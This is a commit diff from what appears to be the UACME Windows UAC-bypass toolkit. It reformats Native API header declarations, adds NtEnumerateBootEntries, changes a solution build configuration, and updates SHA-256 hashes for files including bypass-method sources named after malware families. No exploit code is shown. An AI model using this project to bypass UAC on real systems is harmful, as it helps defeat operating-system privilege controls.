_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout
);
_In_opt_ PLARGE_INTEGER Timeout);
NTSTATUS NTAPI NtYieldExecution(
VOID
);
VOID);
NTSTATUS NTAPI NtCreateMailslotFile(
_Out_ PHANDLE FileHandle,
@ -6214,8 +6303,7 @@ NTSTATUS NTAPI NtCreateMailslotFile(
_In_ ULONG CreateOptions,
_In_ ULONG MailslotQuota,
_In_ ULONG MaximumMessageSize,
_In_ PLARGE_INTEGER ReadTimeout
);
_In_ PLARGE_INTEGER ReadTimeout);
NTSTATUS NTAPI NtSecureConnectPort(
_Out_ PHANDLE PortHandle,
@ -6226,5 +6314,9 @@ NTSTATUS NTAPI NtSecureConnectPort(
_Inout_opt_ PREMOTE_PORT_VIEW ServerView,
_Out_opt_ PULONG MaxMessageLength,
_Inout_opt_ PVOID ConnectionInformation,
_Inout_opt_ PULONG ConnectionInformationLength
);
_Inout_opt_ PULONG ConnectionInformationLength);
NTSTATUS NTAPI NtEnumerateBootEntries(
_Out_ PVOID Buffer,
_Inout_ PULONG BufferLength);

4
Source/uacme.sln
View File

@ -112,8 +112,8 @@ Global
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = Release|x64

25
UACME.sha256
View File

@ -1,8 +1,8 @@
a9ed36b3b02bac486e82e55ebc2f1276de8bb442457d445b39f9ca79fd1508c0 *Compiled\Akagi32.exe
ba610693469c3034ebf9d86f570313fd67a0b9324b29d86f51ec9aef3269a3e2 *Compiled\Akagi64.exe
46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
071fc8be1475719eca58c9dffb36e84a4c281ec77c84f82518d948d9d13d0e9a *Source\uacme.sln
4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
@ -18,7 +18,7 @@ a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\m
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
d590ad1ea548b06e8cd897742fe94f7e5aad08438baa02131ab41ef5669b7b0e *Source\Akagi\Resource.rc
dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
@ -43,7 +43,7 @@ c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\m
d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
07370a4fdfa4cc13ca49ab07bd40aff981015c79c44e1d8f30c658cb83a7ad3a *Source\Akagi\methods\enigma0x3.c
393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
@ -51,8 +51,8 @@ be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\m
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
4fc2df6c52750c4f248795620ed5707dc52cc07647a63d1bffdb73ba48105f02 *Source\Akagi\methods\methods.c
d105d38ed85bc199d62f2d185f8887b7c3fb098212ab944a835619f72add91e5 *Source\Akagi\methods\methods.h
3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@ -60,8 +60,8 @@ a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\m
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
2fac6223bf4efb175c214f6a18fb235dae72b378db85a4e77cab58c6c0cba7e0 *Source\Akagi\methods\tyranid.c
781e60e1e3e89a566b11a346ae111fb95940bdcb2565da249e1f1885ca0612f8 *Source\Akagi\methods\tyranid.h
813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
@ -83,6 +83,7 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
@ -99,12 +100,12 @@ d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuch
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
c77993138f2b53f7a5d133b3f874b615c0e255e1d165b9cb15d89c2c2aab0b16 *Source\Inazuma\main.c
74f75ab22ee4c276633a0eafcbaa31b663b0106dd261ad4627fcdaa149a55751 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
1cae1ba300975774a60dc519d957c530bfe2443f204e28255f26af1523f56087 *Source\Naka\main.c
d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\naka.suppress
5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
9e83a2daa3d4a17cd561676aedd0d8aef3ca4308921d3811a275055288a1c184 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
@ -112,7 +113,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
31d27cc36d83e20db9ea6fbe35e395e18568403c806bb43707bd228f569dea45 *Source\Shared\ntos.h
5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c